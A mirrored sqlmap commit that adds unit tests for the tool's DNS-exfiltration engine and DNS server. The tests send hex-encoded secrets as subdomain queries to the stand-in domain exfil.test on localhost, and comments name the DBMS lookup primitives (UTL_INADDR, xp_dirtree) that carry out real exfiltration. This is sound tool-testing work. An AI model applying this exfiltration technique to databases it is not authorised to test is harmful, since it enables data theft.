mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-06-28 12:31:00 +00:00
Adding some more pyunittests
This commit is contained in:
parent
e82b1b56f7
commit
7e652ed15d
4 changed files with 567 additions and 2 deletions
272
tests/test_dns_engine.py
Normal file
272
tests/test_dns_engine.py
Normal file
|
|
@ -0,0 +1,272 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
|
||||
The DNS-exfiltration extraction engine (lib/techniques/dns/use.py dnsUse) and the
|
||||
channel-detection probe (lib/techniques/dns/test.py dnsTest).
|
||||
|
||||
DNS exfil is normally driven by a back-end DBMS that performs an actual DNS lookup
|
||||
of an attacker-controlled hostname (Oracle UTL_INADDR, MSSQL xp_dirtree, ...),
|
||||
encoding the queried data in the subdomain labels which then reach sqlmap's
|
||||
in-process DNS server. That DBMS behaviour cannot be reproduced locally without a
|
||||
real DNS-emitting engine, so here we drive the REAL dnsUse()/dnsTest() logic + the
|
||||
REAL DNSServer (on a high port, no root) and emulate ONLY that one step: a mock
|
||||
Request.queryPage plays the DBMS - it takes the per-iteration boundaries dnsUse
|
||||
generated and fires a genuine UDP DNS query for
|
||||
'prefix.<hex chunk of the secret>.suffix.domain' at the DNS server.
|
||||
|
||||
So the chunking/offset/reassembly loop, the dns_request snippet rendering, the
|
||||
DNSServer packet parse, pop(prefix,suffix), regex extraction, hex decoding and the
|
||||
detection-then-disable logic are all exercised for real; if any of them regress
|
||||
these go red - without a live DBMS.
|
||||
|
||||
NOTE on fidelity: secrets are kept ASCII so the mock's byte-slice chunking matches a
|
||||
DBMS character-substring exactly. Multi-byte (UTF-8) values, where DBMS SUBSTRING is
|
||||
character-based and a chunk could split a code point, need the real-DBMS run.
|
||||
"""
|
||||
|
||||
import binascii
|
||||
import os
|
||||
import socket
|
||||
import struct
|
||||
import sys
|
||||
import threading
|
||||
import time
|
||||
import unittest
|
||||
|
||||
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
|
||||
from _testutils import bootstrap, set_dbms
|
||||
bootstrap()
|
||||
|
||||
from lib.core.agent import agent
|
||||
from lib.core.common import Backend
|
||||
from lib.core.data import conf, kb
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.exception import SqlmapNotVulnerableException
|
||||
from lib.core.settings import DNS_BOUNDARIES_ALPHABET
|
||||
from lib.core.settings import MAX_DNS_LABEL
|
||||
from lib.request.connect import Connect
|
||||
from lib.request.dns import DNSServer
|
||||
import lib.techniques.dns.use as dnsmod
|
||||
import lib.techniques.dns.test as dnstestmod
|
||||
|
||||
DNS_PORT = 5355
|
||||
|
||||
def _build_query(name, tid=b"\x12\x34"):
|
||||
pkt = tid + b"\x01\x00" + b"\x00\x01" + b"\x00\x00" + b"\x00\x00" + b"\x00\x00"
|
||||
for label in name.split("."):
|
||||
if label:
|
||||
pkt += struct.pack("B", len(label)) + label.encode()
|
||||
return pkt + b"\x00" + b"\x00\x01" + b"\x00\x01"
|
||||
|
||||
class _HighPortDNSServer(DNSServer):
|
||||
# same logic as the real server (parse/pop/run), just bound high so no root is needed
|
||||
def __init__(self, port):
|
||||
self._requests = []
|
||||
self._lock = threading.Lock()
|
||||
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
self._socket.bind(("127.0.0.1", port))
|
||||
self._running = False
|
||||
self._initialized = False
|
||||
|
||||
_CONF = {"dnsDomain": "exfil.test", "hexConvert": False, "api": False, "verbose": 0, "forceDns": False}
|
||||
_KB = {"dnsTest": True, "dnsMode": False, "bruteMode": False, "safeCharEncode": False}
|
||||
|
||||
|
||||
class _DnsCase(unittest.TestCase):
|
||||
DBMS_NAME = "MySQL"
|
||||
|
||||
@classmethod
|
||||
def setUpClass(cls):
|
||||
cls.server = _HighPortDNSServer(DNS_PORT)
|
||||
cls.server.run()
|
||||
while not cls.server._initialized:
|
||||
time.sleep(0.02)
|
||||
|
||||
def setUp(self):
|
||||
self._saved_conf = {k: conf.get(k) for k in _CONF}
|
||||
self._saved_kb = {k: kb.get(k) for k in _KB}
|
||||
self._saved_qp = Connect.queryPage
|
||||
self._saved_randomStr = dnsmod.randomStr
|
||||
self._saved_randomInt = dnstestmod.randomInt
|
||||
self._saved_dnsServer = conf.get("dnsServer")
|
||||
self._saved_hdbR, self._saved_hdbW = dnsmod.hashDBRetrieve, dnsmod.hashDBWrite
|
||||
for k, v in _CONF.items():
|
||||
conf[k] = v
|
||||
for k, v in _KB.items():
|
||||
kb[k] = v
|
||||
conf.dnsServer = self.server
|
||||
# isolate from the session hash DB (avoid cross-test value caching / uninitialized store)
|
||||
dnsmod.hashDBRetrieve = lambda *a, **k: None
|
||||
dnsmod.hashDBWrite = lambda *a, **k: None
|
||||
# MSSQL/PostgreSQL build the payload via the stacked-query injection plumbing
|
||||
# (agent.prefixQuery/agent.payload, needing a full kb.injection). That plumbing is
|
||||
# generic - not DNS logic - and the mock oracle ignores the payload, so stub it to a
|
||||
# pass-through; the DNS-specific snippet/substring/chunking still runs for real.
|
||||
self._saved_prefixQuery, self._saved_payload = agent.prefixQuery, agent.payload
|
||||
agent.prefixQuery = lambda expression, *a, **k: expression
|
||||
agent.payload = lambda place=None, parameter=None, value=None, newValue=None, where=None: newValue or ""
|
||||
set_dbms(self.DBMS_NAME)
|
||||
|
||||
def tearDown(self):
|
||||
for k, v in self._saved_conf.items():
|
||||
conf[k] = v
|
||||
for k, v in self._saved_kb.items():
|
||||
kb[k] = v
|
||||
conf.dnsServer = self._saved_dnsServer
|
||||
Connect.queryPage = self._saved_qp
|
||||
dnsmod.Request.queryPage = self._saved_qp
|
||||
dnsmod.randomStr = self._saved_randomStr
|
||||
dnstestmod.randomInt = self._saved_randomInt
|
||||
dnsmod.hashDBRetrieve, dnsmod.hashDBWrite = self._saved_hdbR, self._saved_hdbW
|
||||
agent.prefixQuery, agent.payload = self._saved_prefixQuery, self._saved_payload
|
||||
|
||||
def _install_oracle(self, secret, working=True, force=None):
|
||||
"""
|
||||
Installs a mock queryPage that plays the DBMS: for each dnsUse iteration it fires a
|
||||
real UDP DNS query carrying the next hex chunk of L{secret}. working=False models a
|
||||
dead DNS channel (the DBMS never emits a lookup). force=(prefix, suffix) pins the
|
||||
random boundary labels (to construct adversarial cases like a domain/suffix collision).
|
||||
"""
|
||||
secret_bytes = secret.encode("utf-8")
|
||||
boundaries = []
|
||||
served = [0]
|
||||
|
||||
real_randomStr = self._saved_randomStr
|
||||
def spy_randomStr(length=4, alphabet=None, **kw):
|
||||
if alphabet == DNS_BOUNDARIES_ALPHABET and length == 3:
|
||||
out = force[len(boundaries) % 2] if force else real_randomStr(length=length, alphabet=alphabet, **kw)
|
||||
boundaries.append(out)
|
||||
return out
|
||||
return real_randomStr(length=length, alphabet=alphabet, **kw) if alphabet is not None else real_randomStr(length=length, **kw)
|
||||
dnsmod.randomStr = spy_randomStr
|
||||
|
||||
dbms = Backend.getIdentifiedDbms()
|
||||
chunk_length = MAX_DNS_LABEL // 2 if dbms in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2
|
||||
|
||||
def oracle(payload=None, *args, **kwargs):
|
||||
if not working:
|
||||
return None
|
||||
prefix, suffix = boundaries[-2], boundaries[-1]
|
||||
chunk = secret_bytes[served[0]:served[0] + chunk_length]
|
||||
if chunk:
|
||||
host = "%s.%s.%s.%s" % (prefix, binascii.hexlify(chunk).decode(), suffix, conf.dnsDomain)
|
||||
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
c.settimeout(3)
|
||||
c.sendto(_build_query(host), ("127.0.0.1", DNS_PORT))
|
||||
try:
|
||||
c.recvfrom(512)
|
||||
finally:
|
||||
c.close()
|
||||
served[0] += len(chunk)
|
||||
for _ in range(100):
|
||||
with self.server._lock:
|
||||
if any(host.encode() in r for r in self.server._requests):
|
||||
break
|
||||
time.sleep(0.01)
|
||||
return None
|
||||
|
||||
Connect.queryPage = staticmethod(oracle)
|
||||
dnsmod.Request.queryPage = staticmethod(oracle)
|
||||
|
||||
def _extract(self, secret):
|
||||
self._install_oracle(secret)
|
||||
return dnsmod.dnsUse("%s AND %d=%d", "user()")
|
||||
|
||||
|
||||
class TestDnsExfilEngine(_DnsCase):
|
||||
DBMS_NAME = "MySQL"
|
||||
|
||||
def test_short_value(self):
|
||||
self.assertEqual(self._extract("luther"), "luther")
|
||||
|
||||
def test_value_spanning_multiple_dns_labels(self):
|
||||
# > one DNS label -> forces the chunking/offset/reassembly loop (multiple queries)
|
||||
secret = "The quick brown fox jumps over the lazy dog 0123456789 abcdef"
|
||||
self.assertEqual(self._extract(secret), secret)
|
||||
|
||||
def test_exact_chunk_boundary(self):
|
||||
# length exactly one chunk: last-chunk break condition (len < chunk_length) edge
|
||||
dbms = Backend.getIdentifiedDbms()
|
||||
cl = MAX_DNS_LABEL // 2 if dbms in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2
|
||||
secret = "A" * cl
|
||||
self.assertEqual(self._extract(secret), secret)
|
||||
|
||||
def test_special_characters(self):
|
||||
secret = "p@ss W0rd!#%&"
|
||||
self.assertEqual(self._extract(secret), secret)
|
||||
|
||||
def test_domain_label_colliding_with_suffix(self):
|
||||
# adversarial: --dns-domain's leading label equals the random suffix. A greedy
|
||||
# extraction regex would run past the real boundary into the domain and corrupt the
|
||||
# value; the (lazy) extraction must still recover it exactly.
|
||||
conf.dnsDomain = "hhh.exfil.test" # leading label 'hhh' == forced suffix
|
||||
self._install_oracle("luther", force=("ggg", "hhh"))
|
||||
self.assertEqual(dnsmod.dnsUse("%s AND %d=%d", "user()"), "luther")
|
||||
|
||||
|
||||
class TestDnsExfilEngineOracle(TestDnsExfilEngine):
|
||||
# Oracle: different dns_request snippet (UTL_INADDR.GET_HOST_ADDRESS, '||' concat) and
|
||||
# SUBSTRC substring template - re-runs the whole battery through the Oracle dialect.
|
||||
DBMS_NAME = "Oracle"
|
||||
|
||||
|
||||
class TestDnsExfilEnginePostgres(TestDnsExfilEngine):
|
||||
# PostgreSQL: stacked-query branch (agent.payload), plpgsql COPY dns_request snippet,
|
||||
# 'SUBSTRING((...)::text FROM x FOR y)' substring template.
|
||||
DBMS_NAME = "PostgreSQL"
|
||||
|
||||
|
||||
class TestDnsExfilEngineMssql(TestDnsExfilEngine):
|
||||
# MSSQL: stacked-query branch, xp_dirtree dns_request snippet, and crucially a SMALLER
|
||||
# chunk_length (MAX_DNS_LABEL//4 - 2) - exercises the alternate chunking arithmetic.
|
||||
DBMS_NAME = "Microsoft SQL Server"
|
||||
|
||||
|
||||
class TestDnsLabelInvariant(unittest.TestCase):
|
||||
"""The exfil chunk is hex-encoded into ONE DNS label, so 2*chunk_length must never exceed the
|
||||
63-octet DNS label limit - otherwise the query carries an invalid (over-long) label and exfil
|
||||
silently breaks. Guards the chunk_length arithmetic in dnsUse for every supported DBMS."""
|
||||
def test_hex_label_within_max_dns_label(self):
|
||||
for dbms in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL):
|
||||
chunk_length = MAX_DNS_LABEL // 2 if dbms in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2
|
||||
self.assertGreater(chunk_length, 0, "%s: non-positive chunk_length" % dbms)
|
||||
self.assertLessEqual(2 * chunk_length, MAX_DNS_LABEL,
|
||||
"%s: hex label (%d) exceeds MAX_DNS_LABEL (%d)" % (dbms, 2 * chunk_length, MAX_DNS_LABEL))
|
||||
|
||||
|
||||
class TestDnsChannelDetection(_DnsCase):
|
||||
"""dnsTest(): probes the channel with a known random integer and disables DNS exfil if
|
||||
the value doesn't come back (unless --force-dns, which then aborts)."""
|
||||
DBMS_NAME = "MySQL"
|
||||
KNOWN = 4815162342
|
||||
|
||||
def _patch_known_int(self):
|
||||
dnstestmod.randomInt = lambda *a, **k: self.KNOWN
|
||||
|
||||
def test_detection_success_keeps_channel(self):
|
||||
self._patch_known_int()
|
||||
self._install_oracle(str(self.KNOWN), working=True)
|
||||
dnstestmod.dnsTest("%s AND %d=%d")
|
||||
self.assertTrue(kb.dnsTest)
|
||||
self.assertEqual(conf.dnsDomain, "exfil.test") # channel kept
|
||||
|
||||
def test_detection_failure_disables_channel(self):
|
||||
self._patch_known_int()
|
||||
self._install_oracle(str(self.KNOWN), working=False) # dead channel
|
||||
dnstestmod.dnsTest("%s AND %d=%d")
|
||||
self.assertFalse(kb.dnsTest)
|
||||
self.assertIsNone(conf.dnsDomain) # exfil turned off
|
||||
|
||||
def test_detection_failure_with_force_dns_raises(self):
|
||||
self._patch_known_int()
|
||||
conf.forceDns = True
|
||||
self._install_oracle(str(self.KNOWN), working=False)
|
||||
self.assertRaises(SqlmapNotVulnerableException, dnstestmod.dnsTest, "%s AND %d=%d")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main(verbosity=2)
|
||||
291
tests/test_dns_server.py
Normal file
291
tests/test_dns_server.py
Normal file
|
|
@ -0,0 +1,291 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
|
||||
The DNS server used for DNS-exfiltration (lib/request/dns.py): raw packet parsing
|
||||
(DNSQuery), fake A-record response crafting, the pop(prefix, suffix) accounting, and
|
||||
- importantly - resilience: a single malformed packet or a transient send error must
|
||||
NOT kill the server thread (which would silently lose all further exfiltration).
|
||||
"""
|
||||
|
||||
import collections
|
||||
import os
|
||||
import socket
|
||||
import struct
|
||||
import sys
|
||||
import threading
|
||||
import time
|
||||
import unittest
|
||||
|
||||
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
|
||||
sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)), ".."))
|
||||
|
||||
from lib.core.settings import MAX_DNS_REQUESTS
|
||||
from lib.request.dns import DNSQuery, DNSServer
|
||||
|
||||
|
||||
def build_query(name, tid=b"\x12\x34", qtype=1):
|
||||
"""Minimal standard (opcode 0) DNS query packet for L{name} (qtype 1=A, 28=AAAA, ...)"""
|
||||
pkt = tid + b"\x01\x00" + b"\x00\x01" + b"\x00\x00" + b"\x00\x00" + b"\x00\x00"
|
||||
for label in name.split("."):
|
||||
if label:
|
||||
pkt += struct.pack("B", len(label)) + label.encode()
|
||||
return pkt + b"\x00" + struct.pack(">H", qtype) + b"\x00\x01"
|
||||
|
||||
|
||||
class _HighPortDNSServer(DNSServer):
|
||||
"""Real DNSServer logic, bound on a high port (no root, no :53 probe)"""
|
||||
def __init__(self, port, sock=None, maxlen=MAX_DNS_REQUESTS):
|
||||
self._requests = collections.deque(maxlen=maxlen)
|
||||
self._lock = threading.Lock()
|
||||
if sock is None:
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
sock.bind(("127.0.0.1", port))
|
||||
self._socket = sock
|
||||
self._running = False
|
||||
self._initialized = False
|
||||
|
||||
|
||||
class _SendFailOnceSocket(object):
|
||||
"""Wraps a real UDP socket; first sendto() raises (simulated transient failure)"""
|
||||
def __init__(self, real):
|
||||
self._real = real
|
||||
self._sends = 0
|
||||
|
||||
def recvfrom(self, *a, **k):
|
||||
return self._real.recvfrom(*a, **k)
|
||||
|
||||
def sendto(self, *a, **k):
|
||||
self._sends += 1
|
||||
if self._sends == 1:
|
||||
raise RuntimeError("simulated transient sendto failure")
|
||||
return self._real.sendto(*a, **k)
|
||||
|
||||
def __getattr__(self, name):
|
||||
return getattr(self._real, name)
|
||||
|
||||
|
||||
class TestDNSQuery(unittest.TestCase):
|
||||
def test_parses_data_bearing_name(self):
|
||||
q = DNSQuery(build_query("pre.deadbeef.suf.exfil.test"))
|
||||
self.assertEqual(q._query, b"pre.deadbeef.suf.exfil.test.")
|
||||
|
||||
def test_empty_and_short_packets_do_not_raise(self):
|
||||
for raw in (b"", b"\x00", b"\x12", b"\x12\x34", b"\x12\x34\x01\x20"):
|
||||
self.assertEqual(DNSQuery(raw)._query, b"") # no exception, empty query
|
||||
|
||||
def test_unterminated_name_does_not_raise(self):
|
||||
# a length byte that runs past the buffer, with no null terminator
|
||||
pkt = b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00" + b"\x20" + b"abc"
|
||||
DNSQuery(pkt) # must not raise (slicing past end yields b"", ord guards)
|
||||
|
||||
def test_response_is_valid_A_record(self):
|
||||
q = DNSQuery(build_query("x.y.z", tid=b"\xab\xcd"))
|
||||
resp = q.response("127.0.0.1")
|
||||
self.assertEqual(resp[:2], b"\xab\xcd") # transaction id echoed
|
||||
self.assertEqual(resp[2:4], b"\x85\x80") # standard response, no error
|
||||
ip = ".".join(str(b if isinstance(b, int) else ord(b)) for b in resp[-4:])
|
||||
self.assertEqual(ip, "127.0.0.1")
|
||||
|
||||
def test_empty_query_yields_empty_response(self):
|
||||
self.assertEqual(DNSQuery(b"\x00").response("127.0.0.1"), b"")
|
||||
|
||||
|
||||
class TestDNSServerRoundTrip(unittest.TestCase):
|
||||
PORT = 5471
|
||||
|
||||
@classmethod
|
||||
def setUpClass(cls):
|
||||
cls.srv = _HighPortDNSServer(cls.PORT)
|
||||
cls.srv.run()
|
||||
while not cls.srv._initialized:
|
||||
time.sleep(0.02)
|
||||
|
||||
def _send(self, name):
|
||||
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
c.settimeout(3)
|
||||
c.sendto(build_query(name), ("127.0.0.1", self.PORT))
|
||||
try:
|
||||
c.recvfrom(512)
|
||||
except socket.timeout:
|
||||
pass
|
||||
finally:
|
||||
c.close()
|
||||
for _ in range(100):
|
||||
with self.srv._lock:
|
||||
if any(name.encode() in r for r in self.srv._requests):
|
||||
return True
|
||||
time.sleep(0.01)
|
||||
return False
|
||||
|
||||
def test_roundtrip_and_pop(self):
|
||||
self.assertTrue(self._send("aaa.cafe.bbb.exfil.test"))
|
||||
self.assertIsNone(self.srv.pop("zzz", "yyy")) # wrong boundaries
|
||||
self.assertIsNotNone(self.srv.pop("aaa", "bbb")) # correct boundaries
|
||||
self.assertIsNone(self.srv.pop("aaa", "bbb")) # consumed only once
|
||||
|
||||
def test_non_a_query_type_still_recorded(self):
|
||||
# a DBMS resolver may emit AAAA (28) / TXT (16) lookups - the exfiltrated name is in the
|
||||
# labels regardless of qtype, and the server records before crafting the (A) response
|
||||
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
c.settimeout(2)
|
||||
c.sendto(build_query("ggg.beef.hhh.exfil.test", qtype=28), ("127.0.0.1", self.PORT))
|
||||
try:
|
||||
c.recvfrom(512)
|
||||
except socket.timeout:
|
||||
pass
|
||||
finally:
|
||||
c.close()
|
||||
for _ in range(200):
|
||||
if self.srv.pop("ggg", "hhh"):
|
||||
return
|
||||
time.sleep(0.01)
|
||||
self.fail("AAAA-type query was not recorded (exfil would be lost for AAAA-resolving DBMSes)")
|
||||
|
||||
|
||||
class TestDNSServerMemoryBound(unittest.TestCase):
|
||||
"""The server records every received query (it listens on :53); only matching ones are
|
||||
popped. Unrelated/stray traffic and resolver retries must not grow memory without bound."""
|
||||
PORT = 5475
|
||||
|
||||
def test_requests_are_bounded_and_recent_kept(self):
|
||||
srv = _HighPortDNSServer(self.PORT, maxlen=50)
|
||||
srv.run()
|
||||
while not srv._initialized:
|
||||
time.sleep(0.02)
|
||||
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
for i in range(200): # flood well past the bound
|
||||
c.sendto(build_query("noise%d.unrelated.test" % i), ("127.0.0.1", self.PORT))
|
||||
c.close()
|
||||
# a legit exfil query right after the flood must still be capturable
|
||||
c2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); c2.settimeout(2)
|
||||
c2.sendto(build_query("ppp.d00d.qqq.exfil.test"), ("127.0.0.1", self.PORT))
|
||||
try:
|
||||
c2.recvfrom(512)
|
||||
except socket.timeout:
|
||||
pass
|
||||
finally:
|
||||
c2.close()
|
||||
popped = None
|
||||
for _ in range(200):
|
||||
popped = srv.pop("ppp", "qqq")
|
||||
if popped:
|
||||
break
|
||||
time.sleep(0.01)
|
||||
with srv._lock:
|
||||
n = len(srv._requests)
|
||||
self.assertLessEqual(n, 50, "request buffer exceeded its bound (%d)" % n)
|
||||
self.assertIsNotNone(popped, "a fresh exfil query was lost after a flood of stray traffic")
|
||||
|
||||
|
||||
class TestDNSServerResilience(unittest.TestCase):
|
||||
def _make(self, port, sock=None):
|
||||
srv = _HighPortDNSServer(port, sock=sock)
|
||||
srv.run()
|
||||
while not srv._initialized:
|
||||
time.sleep(0.02)
|
||||
return srv
|
||||
|
||||
def _query(self, port, name):
|
||||
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
c.settimeout(1)
|
||||
c.sendto(build_query(name), ("127.0.0.1", port))
|
||||
try:
|
||||
c.recvfrom(512)
|
||||
except socket.timeout:
|
||||
pass
|
||||
finally:
|
||||
c.close()
|
||||
|
||||
def _recorded(self, srv, token, tries=120):
|
||||
for _ in range(tries):
|
||||
with srv._lock:
|
||||
if any(token.encode() in r for r in srv._requests):
|
||||
return True
|
||||
time.sleep(0.01)
|
||||
return False
|
||||
|
||||
def test_survives_transient_send_error(self):
|
||||
port = 5472
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
s.bind(("127.0.0.1", port))
|
||||
srv = self._make(port, sock=_SendFailOnceSocket(s))
|
||||
self._query(port, "aaa.11.bbb.exfil.test") # first sendto raises
|
||||
self._query(port, "ccc.22.ddd.exfil.test") # must still be served
|
||||
self.assertTrue(self._recorded(srv, "ccc.22.ddd"),
|
||||
"DNS server died after one failing sendto (lost subsequent exfil)")
|
||||
self.assertTrue(srv._running)
|
||||
|
||||
def test_survives_malformed_packets(self):
|
||||
port = 5473
|
||||
srv = self._make(port)
|
||||
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
for junk in (b"", b"\x00", b"\xff" * 7, b"\x12\x34\x01\x00\x00\x01" + b"\x20abc"):
|
||||
c.sendto(junk, ("127.0.0.1", port))
|
||||
c.close()
|
||||
self._query(port, "ok.33.fine.exfil.test")
|
||||
self.assertTrue(self._recorded(srv, "ok.33.fine"),
|
||||
"DNS server died on a malformed packet")
|
||||
|
||||
|
||||
class TestDNSServerConcurrency(unittest.TestCase):
|
||||
"""Under --threads, many workers fire DNS queries and call pop() while the server thread
|
||||
appends - all guarded by one lock. Each worker must get back exactly its own data."""
|
||||
PORT = 5474
|
||||
|
||||
@classmethod
|
||||
def setUpClass(cls):
|
||||
cls.srv = _HighPortDNSServer(cls.PORT)
|
||||
cls.srv.run()
|
||||
while not cls.srv._initialized:
|
||||
time.sleep(0.02)
|
||||
|
||||
def test_concurrent_send_and_pop_no_crosstalk(self):
|
||||
import binascii, re
|
||||
N = 12
|
||||
errors = []
|
||||
|
||||
def worker(i):
|
||||
# distinct boundary labels per worker (DNS boundary alphabet = letters, no a-f/digits)
|
||||
prefix = "gg" + chr(ord("g") + i)
|
||||
suffix = "mm" + chr(ord("g") + i)
|
||||
secret = ("worker-%02d-secret" % i).encode()
|
||||
host = "%s.%s.%s.exfil.test" % (prefix, binascii.hexlify(secret).decode(), suffix)
|
||||
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
c.settimeout(2)
|
||||
try:
|
||||
c.sendto(build_query(host), ("127.0.0.1", self.PORT))
|
||||
try:
|
||||
c.recvfrom(512)
|
||||
except socket.timeout:
|
||||
pass
|
||||
finally:
|
||||
c.close()
|
||||
got = None
|
||||
for _ in range(200):
|
||||
got = self.srv.pop(prefix, suffix)
|
||||
if got:
|
||||
break
|
||||
time.sleep(0.01)
|
||||
if not got:
|
||||
errors.append("worker %d: never popped its query" % i); return
|
||||
m = re.search(r"%s\.(?P<r>.+?)\.%s" % (prefix, suffix), got, re.I)
|
||||
if not m or binascii.unhexlify(m.group("r")) != secret:
|
||||
errors.append("worker %d: cross-talk/corruption got=%r" % (i, got))
|
||||
|
||||
threads = [threading.Thread(target=worker, args=(i,)) for i in range(N)]
|
||||
for t in threads:
|
||||
t.start()
|
||||
for t in threads:
|
||||
t.join()
|
||||
self.assertEqual(errors, [], "concurrency failures: %s" % errors)
|
||||
# every queued request consumed exactly once -> nothing left behind
|
||||
self.assertEqual(self.srv.pop("gg" + chr(ord("g")), "mm" + chr(ord("g"))), None)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main(verbosity=2)
|
||||
Loading…
Add table
Add a link
Reference in a new issue